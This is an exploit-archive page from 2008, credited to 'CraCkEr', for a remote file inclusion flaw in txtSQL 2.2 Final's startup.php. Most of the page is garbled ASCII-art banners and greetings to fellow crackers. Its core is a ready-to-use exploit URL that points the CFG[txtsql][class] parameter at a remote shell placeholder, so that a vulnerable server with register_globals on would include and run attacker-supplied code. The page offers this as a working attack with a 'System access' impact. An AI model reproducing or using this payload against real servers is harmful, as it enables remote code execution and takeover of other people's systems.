[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : txtSQL 2.2 Final (startup.php) Remote File Inclusion Vulnerability
# Published : 2008-08-10
# Author : CraCkEr
# Previous Title : Quicksilver Forums 1.4.1 forums[] Remote SQL Injection Exploit
# Next Title : PHP-Ring Webring System 0.9.1 Insecure Cookie Handling Vulnerability
???????????????????????????????????????????????????????????????????????????????
?? C r a C k E r ??
?? T H E C R A C K O F E T E R N A L M I G H T ??
??????????????????????????????????????????????????????????????????????????????
????? From The Ashes and Dust Rises An Unimaginable crack.... ?????
??????????????????????????????????????????????????????????????????????????????
?? [ Remote File Include ] ??
??????????????????????????????????????????????????????????????????????????????
: Author : CraCkEr : : :
? Group : N/A ? ? ?
? Script : txtSQL 2.2 Final ? ? Register Globals : ?
? Download : sourceforge.net ? ? ?
? Method : GET ? ? [?] ON [ ] OFF ?
? Critical : High [????????] ? ? ?
? Impact : System access ? ? ?
? ????????????????????????????????????? ???????????????????????????????????? ?
? DALnet #crackers ??
??????????????????????????????????????????????????????????????????????????????
: :
? Release Notes: ?
? ????????????? ?
? Typically used for remotely exploitable vulnerabilities that can lead to ?
? system compromise. ?
? ?
??????????????????????????????????????????????????????????????????????????????
?? Exploit URL's ??
??????????????????????????????????????????????????????????????????????????????
[RFI]
http://localhost/path/examples/txtSQLAdmin/startup.php?CFG[txtsql][class]=[SHELL]
??????????????????????????????????????????????????????????????????????????????
Greets:
The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL .
??????????????????????????????????????????????????????????????????????????????
?? ? CraCkEr 2008 ??
??????????????????????????????????????????????????????????????????????????????
# www.Syue.com [2008-08-10]